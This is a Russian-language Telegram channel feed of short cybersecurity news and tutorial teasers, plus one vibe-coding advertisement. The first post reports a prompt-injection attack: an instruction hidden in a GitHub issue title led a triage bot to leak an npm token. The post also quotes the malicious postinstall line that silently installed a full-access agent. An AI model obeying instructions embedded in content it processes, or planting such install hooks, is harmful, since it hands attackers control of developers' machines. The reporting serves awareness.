ИИ тебя взломает
2.15K subscribers
656 photos
43 videos
622 links
О том, как выжить в сети, когда нейросети учатся взламывать и собирать данные.

Реклама: @whoisdan
Download Telegram
😏 Агент под прикрытием: как один заголовок-промпт на GitHub помог взломать 4000 компьютеров

17 февраля в репозитории npm была опубликована версия cline@2.3.0. С виду – ничего особенного: исполняемый файл был идентичен предыдущему байт в байт.

Лишь в файле package.json притаилась одна лишняя строчка:
 "postinstall": "npm install -g openclaw@latest"


В течение следующих восьми часов каждый разработчик, решивший установить или обновить Cline, невольно устанавливал OpenClaw.

Это отдельный ИИ-агент с полным доступом к системе, который устанавливался глобально и без какого-либо спроса – пакет успели скачать около 4000 раз, прежде чем его удалили из общего доступа.


Весь фокус в том, как именно злоумышленник раздобыл npm-токен — он просто спрятал инструкцию (промпт) прямо в заголовке тикета на GitHub.

Бот, занимавшийся сортировкой заявок, прочитал этот заголовок, принял его за приказ и послушно исполнил.

Промт Хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥1
🦆 Лучшие методы защиты DNS, которые нужно внедрить уже сейчас

В статье рассказали о лучших практиках безопасности DNS — от базового управления сервером до использования шифрования и блокировки вредоносных сайтов.

Вы узнаете, как защитить целостность и конфиденциальность ваших служб разрешения имён и обеспечить надёжное функционирование сети.


Промт Хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
2
🦍 5 ошибок в изучении ИБ, которых следует избегать

В этом видео автор на своём 10-летнем опыте ИБ-специалиста, рассказал, что бы он мог сделать иначе, если бы обладал теми знанями, которые имеет сейчас.

Вы узнаете о 5 самых распространенных ошибках в обучении и получите практические советы, как их точно суметь избежать.


Промт Хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
💃 Коллекция гайдов, шпаргалок, хаков, однострочников, cli/web-инструментов и многого другого

Коллекция для пентестеров, кибербезопасников, системных и сетевых админов, и DevOps-инженеров.

Промт Хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
1👍1
👍 Хакер в поисках инопланетян

Рассказываем, как Гэри Маккиннон в одиночку совершил одну из самых крупных и технически сложных кибератак на военные и космические сети США и причём тут НЛО.

Промт Хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
4
🐱 ФБР закрыло хак-форум LeakBase и изъяло информацию о 142 тыс. пользователей

3 и 4 марта ФБР совместно с правоохранителями из 14 стран провело скоординированную Европолом операцию по захвату LeakBase — он действовал с 2021 года и насчитывалось более 142 тыс. участников.

Было конфисковано два домена, а также правоохранители получили полную базу данных ресурса, включая аккаунты пользователей, публикации, приватные сообщения и IP-логи.


Промт Хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
👍 Подмена SIM-карты: как работает атака и как защититься?

В статье рассказали о такой опасности, как SIM-swapping и поделились мерами для ее предотвращения.

Промт Хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
🐸 Европол закрыл фишинговую платформу Tycoon2FA

Международная операция, координируемая Европолом, нарушила работу Tycoon2FA — одной из крупнейших фишинговых платформ, работавших по модели фишинг-как-услуга (phishing-as-a-service, PhaaS)

На долю Tycoon2FA приходилось 60% всех заблокированных фишинговых атак

Жертвами платформы стали почти 100 000 организаций по всему миру, в том числе госучреждения, школы и медицинские организации.


В ходе операции правоохранители изъяли 330 доменов, включая панели управления и фишинговые страницы.

Промт Хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
🪨 Обнаружение защиты веб-приложений

WAFW00F — инструмент для идентификации продуктов защиты веб-приложений (файерволов веб-приложений, WAF).

WAF — система, которая устанавливается перед веб-сервером. Она помогает обнаружить и заблокировать различные виды атак на веб-приложения.


Работает путём отправки специально сформированных HTTP-запросов на целевой сайт и анализа ответов, чтобы определить, есть ли там WAF, а также версию и производителя используемого фильтра.

Промт Хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
🪨 Экс-инженер DOGE украл данные 500 миллионов граждан США — гений вынес на флешке базу всех американцев с 1936 года.

Пока Маск оптимизировал расходы, его сотрудник оптимизировал «доступ уровня бога», скачав реестры Numident и Master Death File.

Схема года от «ликвидатора бюрократии»:
— Скачать данные на USB-носитель перед увольнением;
— Попытаться «санировать» их на домашнем ПК для работы в частной конторе;
— «В случае провала — просто ждать президентского помилования» (буквальная цитата)


SSA, конечно, делает вид, что всё под контролем.

Промт Хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥2😁2
🐧 Необычные и полезные утилиты Linux, о которых вы, скорее всего, не знали

В этом видео показали инструменты для повышения продуктивности и удобства при работе с Linux.

Большинство инструментов могут работать как и на Windows, так и на MacOS.


Промт Хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
🐈‍⬛ В Steam обнаружили вредоносные игры

ФБР пытается установить личности лиц, пострадавших после установки одной из вредоносных игр в Steam с мая 2024 года по январь 2026 года.

В рамках расследования бюро выявило несколько вредоносных игр: BlockBlasters, Chemia, Dashverse/DashFPS, Lampy, Lunara, PirateFi и Tokenova.


Промт Хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
🤔2👍1
🐶 Аппаратные токены безопасности: полный гайд по выбору и использованию

Это физические устройства, по размеру напоминающие флешку или брелок. Они генерирует или хранят криптографические ключи, которые используются для аутентификации.


В статье рассматриваются виды токенов, критерии выбора и рекомендации по использованию.

Промт Хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
👏1
🐸 Как настроить «бесконечную ловушку» для вредоносных HTTP-ботов

В этой статье рассмотрим, как HellPot помогает бороться с несанкционированными атаками, какие функции и возможности он предоставляет, а также как его настроить и использовать на вашем сервере.

Промт Хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥1
🐱 Как расследовать кибератаку за 24 часа: пошаговое руководство

Первые 24 часа после обнаружения кибератаки — это критический период, который определяет успех всего расследования.

Статистика показывает, что 78% успешных расследований завершаются в первые 24 часа, когда команда реагирования действует.


В данном руководстве полный гайд по быстрому расследованию кибератак.

Промт Хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
👍21
😐 Ошибка в коде 2017 года обнуляет защиту систем Linux

Уязвимость, скрывавшаяся в Linux почти 8 лет, позволяет обычному пользователю системы получить полный контроль над сервером.

Речь идёт о проблемах в механизме безопасности AppArmor, который по умолчанию включён во многих популярных дистрибутивах.


AppArmor входит в ядро Linux и выполняет роль обязательного контроля доступа — механизм ограничивает возможности отдельных программ, не позволяя приложениям читать чужие файлы, выполнять опасные системные вызовы или получать дополнительные права.

Промт Хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
🫤 Лучшие инструменты Kali Linux

В статье рассмотрим самые лучшие инструменты, а также разберём каждый из них.

Промт Хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
2🔥1
🤔 Хакеры используют ИИ, чтобы внедрять вредоносы через Unicode-символы

Исследователи нашли как минимум 151 репозиторий на GitHub, где опасный код спрятан в невидимых Unicode-символах. В редакторе это выглядит как обычный пробел — при ревью ты его буквально не замечаешь, а он тем временем крадет данные.

Работающие схожим образом вредоносы обнаружены в репозиториях npm, Open VSX и на маркетплейсе VS Code.


Промт Хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
2👍1🤯1
😲 Учимся защищать SSH-сервер

В этом видеоуроке в тонкостях рассказали обо всех способах защиты SSH-сервера и показал, как это всё работает.

Подробно изучим:
— запрет входа Root;
— Port Knocking;
— запрет SSH-входа по паролю;
— и другие способы защиты.


Промт Хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡️ Писать код руками больше не нужно!

Привет. Меня зовут Кирилл. Я создаю топовые подборки с уроками по AI и вайбкодингу:

— 60+ промптов для дебага: поиск ошибок, оптимизация кода

— 40 бесплатных курсов по вайбкодингу

— 150 гайдов, как использовать ChatGPT, Claude Code, Antigravity, Cursor, Perplexity, Lovable

— 100 готовых модулей: авторизация, админки, логирование, тесты, i18n

— 37 MCP серверов: дизайн, разработка, Тесты/QA, деплой


Всего 10 минут в день на канале и ты начнешь писать код на 85% быстрее и сможешь за пару дней закрывать спринты.

Подписывайся, чтобы получать подборки каждую неделю!
Please open Telegram to view this post
VIEW IN TELEGRAM
👎1
🐸 В сети нашли опасный для айфонов инструмент DarkSword

Эта технология взлома позволяет захватывать устройства под управлением iOS 18.4-18.7 , которые просто заходят на зараженные веб-сайты.

Её обнаружили кибербезопасники из Google, iVerify и Lookout.

«У огромного числа пользователей iOS могут быть украдены все их личные данные просто за посещение популярного веб-сайта», — говорит Роки Коул, соучредитель и генеральный директор iVerify.

«Сотни миллионов людей, которые все еще используют старые устройства Apple или старые версии операционных систем, остаются уязвимыми»


Промт Хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
👏1